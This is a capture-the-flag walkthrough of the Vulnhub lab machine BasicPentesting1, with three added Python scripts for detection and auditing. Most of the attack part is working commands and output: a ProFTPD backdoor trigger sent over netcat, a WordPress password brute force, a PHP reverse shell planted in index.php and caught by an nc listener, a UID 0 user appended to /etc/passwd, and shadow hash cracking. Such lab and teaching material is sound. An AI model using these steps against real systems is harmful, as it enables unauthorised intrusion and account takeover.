
Vulnhub Writeup : BasicPentesting1
Box Stats :
| Box Information | Details |
|---|---|
| Box Name | BasicPentesting1 |
| Series | Basic Pentesting |
| Release Date | 8 Dec 2017 |
| Author | Josiah Pierce |
| Difficulty | Easy |
| Download Link | Link |
Network Scan
The IP of the target box is 192.168.1.15; now we run an nmap scan against the target:
$ nmap -sV --top-ports 1000 192.168.1.15 -oN nmap.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds
Nothing unusual, but a quick search for ProFTPD 1.3.3c revealed that it is a backdoored version of the FTP server. To exploit this backdoor we just need to connect to port 21 with netcat and send the trigger "HELP ACIDBITCHEZ".
$ nc 192.168.1.15 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
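The version match that gives the backdoored build away is easy to automate on the defensive side. The following Python script is an added example, not part of the original writeup: it parses nmap's normal (-oN) output, flags any open service whose product and version appear on a hypothetical watchlist, and checks a captured FTP control-channel transcript for the HELP trigger quoted above. The watchlist contents and the sample transcript are constructed for the example.

```python
import re

# Constructed sample: the port lines from the writeup's nmap -oN output, embedded inline.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.15
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     ProFTPD 1.3.3c
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
"""

# Hypothetical watchlist (an assumption of this example): product/version pairs a defender
# wants flagged on sight. ProFTPD 1.3.3c is the trojaned release the writeup exploits.
WATCHLIST = {
    ("ProFTPD", "1.3.3c"): "backdoored release: HELP <trigger> yields a root shell",
}

# The trigger string from the writeup; a NIDS rule or FTP log review can look for it.
BACKDOOR_TRIGGER = "ACIDBITCHEZ"

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return one dict per port line (port, proto, state, service, version) of -oN output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, header and summary lines carry no port
        port, proto, state, service, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return services


def product_and_version(version_field):
    """Split nmap's free-text version column at the first token that looks like a version
    number: 'Apache httpd 2.4.18 ((Ubuntu))' -> ('Apache httpd', '2.4.18'). None if absent."""
    parts = version_field.split()
    for i, token in enumerate(parts):
        if token[0].isdigit():
            return " ".join(parts[:i]), token
    return None


def flag_services(services, watchlist=WATCHLIST):
    """Return (port, product, version, note) for every open service on the watchlist."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        pv = product_and_version(svc["version"])
        if pv in watchlist:
            findings.append((svc["port"], pv[0], pv[1], watchlist[pv]))
    return findings


def find_backdoor_trigger(ftp_commands):
    """Indices of commands in a captured FTP command list that carry the backdoor trigger."""
    hits = []
    for i, cmd in enumerate(ftp_commands):
        parts = cmd.strip().split(None, 1)
        if len(parts) == 2 and parts[0].upper() == "HELP" \
                and parts[1].strip().upper() == BACKDOOR_TRIGGER:
            hits.append(i)
    return hits


if __name__ == "__main__":
    for finding in flag_services(parse_nmap(NMAP_OUTPUT)):
        print("FLAG", finding)
    # Constructed FTP transcript: a normal login followed by the trigger command.
    print(find_backdoor_trigger(["USER anonymous", "PASS guest", "HELP ACIDBITCHEZ"]))
```

The version split is deliberately naive (first numeric-looking token), which is good enough for the product strings nmap prints for ProFTPD, OpenSSH and Apache; an inventory that feeds a CPE matcher would want the `-oX` output instead.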
To get a proper interactive shell we can use the python pty trick: python -c 'import pty;pty.spawn("/bin/bash")'
$ nc 192.168.1.15 21
python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#
We got root access to the machine. Now let's find other ways to get root.
Web Application Reconnaissance
From the nmap scan we can see that port 80 is open, which means a web server is running.

In the list above, 192.168.1.15 is our VM's IP address.
Directory Bruteforce
Bruteforcing using dirb
$ dirb http://192.168.1.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.15/secret/
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/
---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/
---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 28 19:17:13 2019
The scan above shows that there is a hidden WordPress blog at http://192.168.1.15/secret/, let's check it out.

The blog redirects to http://vtcsec/secret/, so we add vtcsec to our /etc/hosts file (the hosts format is IP first, then hostname, and the redirect has to run with root privileges, so tee is used instead of a shell redirect):
echo "192.168.1.15 vtcsec" | sudo tee -a /etc/hosts
Now the WordPress blog opens properly.
WPScan on WordPress Blog
$ wpscan --url http://192.168.1.15/secret/ --enumerate u
WordPress Security Scanner by the WPScan Team
Version 3.7.1
WPScan.io - Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.1.15/secret/
[+] Started: Sun Sep 29 05:46:41 2019
Interesting Finding(s):
[+] http://192.168.1.15/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.15/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.15/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.
[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00
As we can see, the user admin was identified by the scan above. Now let's brute force the WordPress login, using a simple password wordlist:
wpscan -U admin -P common.txt --url http://192.168.1.15/secret/
The output shows the password, which is also admin.
.....
[i] Valid Combinations Found:
| Username: admin, Password: admin
.....
Now login to wordpress with above credentials.
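The brute force above is noisy on the server side: every guess is a POST to wp-login.php from one source within seconds. The following Python script is an added example, not part of the original writeup, that parses Apache combined-format access log lines and raises an alert when one client produces more than a threshold of failed logins inside a sliding time window. The log lines are constructed for the example; the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format access log (not taken from the target): one scanner
# host hammering wp-login.php, then one ordinary login from another host.
ACCESS_LOG = """\
192.168.1.10 - - [29/Sep/2019:05:50:00 +0000] "GET /secret/wp-login.php HTTP/1.1" 200 2200 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:01 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:01 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:02 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:02 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:03 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:03 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 3412 "-" "WPScan v3.7.1"
192.168.1.10 - - [29/Sep/2019:05:50:04 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.7.1"
192.168.1.20 - - [29/Sep/2019:05:52:10 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse_access_log(text):
    """Turn combined-format lines into event dicts; lines that do not parse are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        events.append({"ip": ip,
                       "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
                       "method": method,
                       "path": path.split("?", 1)[0],  # drop any query string
                       "status": int(status)})
    return events


def is_failed_login(event):
    """A failed wp-login.php POST re-renders the form with HTTP 200; success redirects (302)."""
    return (event["method"] == "POST"
            and event["path"].endswith("/wp-login.php")
            and event["status"] == 200)


def detect_login_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: most failed logins seen in any `window`} for clients that reach `threshold`."""
    per_ip = defaultdict(list)
    for e in events:
        if is_failed_login(e):
            per_ip[e["ip"]].append(e["time"])
    alerts = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


if __name__ == "__main__":
    print(detect_login_bruteforce(parse_access_log(ACCESS_LOG)))
```

The 200-versus-302 distinction is what makes this count failures rather than logins. The same approach does not transfer directly to xmlrpc.php (also listed by wpscan above), which answers 200 whether or not the credentials were right, so that endpoint needs the response body or a request-rate rule instead.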
Getting a shell using WordPress
Link for php reverse shell : Github Link
Change the IP address and port number in the script, then paste it into the index.php file of the WordPress site.

Now start netcat listener
$ nc -lvvp 1234
And open the wordpress page.
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:46:01 up 2 min, 0 users, load average: 0.58, 0.60, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
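Dropping a reverse shell into a theme file leaves two traces a defender can check for: the file's hash no longer matches the shipped version, and the source now calls socket and process functions a theme never needs. The following Python script is an added example, not part of the original writeup or of WordPress: it walks a theme directory, compares each PHP file against a baseline of known-good SHA-256 digests, and greps the source for those function calls. The theme directory, its files and the baseline are constructed in a temporary directory for the example.

```python
import hashlib
import os
import re
import tempfile

# PHP functions that open sockets or spawn processes; a theme file has no business calling them.
SUSPICIOUS_CALL = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|pcntl_exec)\s*\(", re.I)
# eval() fed by a decoder is the classic obfuscated-webshell shape.
EVAL_DECODE = re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_theme(root, baseline):
    """Return (relative_path, reason) findings for every PHP file under root.

    baseline maps relative path -> expected SHA-256 (e.g. computed from a clean install)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = sha256_file(full)
            if rel not in baseline:
                findings.append((rel, "file not in baseline"))
            elif baseline[rel] != digest:
                findings.append((rel, "hash differs from baseline"))
            with open(full, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            for m in SUSPICIOUS_CALL.finditer(src):
                findings.append((rel, f"calls {m.group(1)}()"))
            if EVAL_DECODE.search(src):
                findings.append((rel, "eval() of decoded payload"))
    return findings


def build_fixture():
    """Constructed theme directory: a clean functions.php and an index.php that was edited
    to add the kind of calls a reverse shell makes. Returns (root, baseline)."""
    root = tempfile.mkdtemp(prefix="theme-")
    clean = "<?php\n// constructed benign theme file\nget_header(); echo 'hello'; get_footer();\n"
    clean_digest = hashlib.sha256(clean.encode()).hexdigest()
    baseline = {"functions.php": clean_digest, "index.php": clean_digest}
    with open(os.path.join(root, "functions.php"), "w") as fh:
        fh.write(clean)
    tampered = clean + ("// constructed fixture: not a working shell, just the call shapes\n"
                        "$s = fsockopen($host, $port);\n"
                        "$p = proc_open('/bin/sh -i', $spec, $pipes);\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(tampered)
    return root, baseline


if __name__ == "__main__":
    theme_root, known_good = build_fixture()
    for finding in scan_theme(theme_root, known_good):
        print(finding)
```

On a real install the baseline would come from the theme's distributed archive (or from `wp core verify-checksums` for core files); the hash comparison catches any edit, while the call patterns catch files that were added rather than edited.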
We got a shell, but it is not a root shell; we need to escalate privileges to root.
Getting root Privilege
Method 1
By overwriting the /etc/passwd file: as we can see, /etc/passwd is readable and writable by all users.
$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
So by appending a new user with root privileges and a password to the /etc/passwd file, we can get a root shell.
Preparing the new user to append to the file: the root user's entry looks like this:
root:x:0:0:root:/root:/bin/bash
where the columns are as follows:
Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory : Shell
In place of the password there is an x, which means the password is stored in the /etc/shadow file. Now let's create an encrypted password for the new user:
$ openssl passwd -1 -salt hack password123
$1$hack$MLgkAESrYp7kzYz0Ex2fV/
Where:
-1 : MD5-based password algorithm (other options are -5 for SHA-256 and -6 for SHA-512)
-salt : the salt, which is "hack"
password123 : the password
Now we have to append the following line to the /etc/passwd file:
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note: put a \ before every $ in the password field, otherwise the shell will try to interpret it as a variable. Now try to log in as our newly created user.
$ su - newroot
su: must be run from a terminal
But it throws an error, which means we need a tty, and that can be obtained with the python pty trick.
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123
root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#
Yep, we got the root shell!
Method 2
By cracking the passwords of existing users: this method only works if the /etc/shadow file is world-readable, which it is not by default. But in this case we can read the /etc/shadow file:
$ cat /etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:7484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::
The shadow file stores each account's actual password in hashed (crypt) form, together with the password-aging properties, i.e. it stores the secure user account information.
As we can see, the user marlinspike has a password hash:
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
Now save the above line into the file pass.txt and try to crack the hash with John the Ripper (john).
root@ae3e2e69805d:~/# john pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ae3e2e69805d:~/# john --show pass.txt
marlinspike:marlinspike:17484:0:99999:7:::
1 password hash cracked, 0 left
and the password for marlinspike is marlinspike, now let's try to log in to the marlinspike account.
$ su - marlinspike
su: must be run from a terminal
This means we need a tty shell; then we try to switch to root.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike
su - marlinspike
Password: marlinspike
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
root@vtcsec:/home/marlinspike# whoami
whoami
root
root@vtcsec:/home/marlinspike#
We got root shell again.
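Both escalation methods rest on the same misconfiguration class: a world-writable /etc/passwd (Method 1) and a world-readable /etc/shadow (Method 2), plus the passwd field layout and the $1$/$5$/$6$ hash prefixes explained under Method 1. The following Python script is an added example, not part of the original writeup: it parses passwd-format text, flags extra UID 0 accounts and password hashes stored in passwd rather than shadow, names the crypt scheme behind a hash from its prefix, and compares a file's permission bits with the mode it should have. The sample passwd text is constructed (it reuses the root and newroot lines from the writeup); the expected modes 0644 and 0640 are the conventional Ubuntu defaults and are an assumption of the example.

```python
import stat

# Constructed sample of /etc/passwd: the root line from the writeup, a few ordinary
# accounts, and the "newroot" line that the writeup appends.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def crypt_algorithm(field):
    """Name the crypt(3) scheme behind a password field, or None when the field holds no
    hash ('x' defers to /etc/shadow; '*', '!' and '' mean locked or disabled)."""
    if field in ("", "x", "*") or field.startswith("!"):
        return None
    for prefix, name in (("$1$", "md5crypt"), ("$5$", "sha256crypt"), ("$6$", "sha512crypt")):
        if field.startswith(prefix):
            return name
    return "other"


def parse_passwd(text):
    """Split passwd lines into dicts keyed by FIELDS; malformed lines keep their raw text."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS) or not parts[2].isdigit() or not parts[3].isdigit():
            entries.append({"line": lineno, "raw": line, "malformed": True})
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entry.update(line=lineno, malformed=False)
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return (line, account, reason) triples for entries a defender should question."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["raw"], "malformed entry (expected 7 colon-separated fields)"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], e["name"], "UID 0 account other than root"))
        algo = crypt_algorithm(e["pw"])
        if algo is not None:  # a hash here bypasses /etc/shadow entirely
            findings.append((e["line"], e["name"], f"{algo} password hash stored in passwd, not shadow"))
    return findings


def audit_mode(path, mode, expected):
    """Compare a file's permission bits (e.g. os.stat(path).st_mode) with the expected octal
    mode; returns human-readable problems, empty when the mode is acceptable."""
    perm = stat.S_IMODE(mode)
    problems = []
    if perm & stat.S_IWOTH:
        problems.append(f"{path} is world-writable ({perm:04o})")
    if perm & stat.S_IWGRP and not expected & stat.S_IWGRP:
        problems.append(f"{path} is group-writable ({perm:04o})")
    if perm & stat.S_IROTH and not expected & stat.S_IROTH:
        problems.append(f"{path} is world-readable ({perm:04o})")
    return problems


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE):
        print(finding)
    # The writeup's ls output shows /etc/passwd as -rw-rw-rw-, and /etc/shadow was readable.
    print(audit_mode("/etc/passwd", 0o100666, 0o644))
    print(audit_mode("/etc/shadow", 0o100644, 0o640))
```

Run against a live system, `os.stat("/etc/passwd").st_mode` and `os.stat("/etc/shadow").st_mode` feed `audit_mode`, and the same `crypt_algorithm` applied to the second field of each shadow line shows which accounts still use md5crypt, the scheme `openssl passwd -1` produces and the weakest of the three listed.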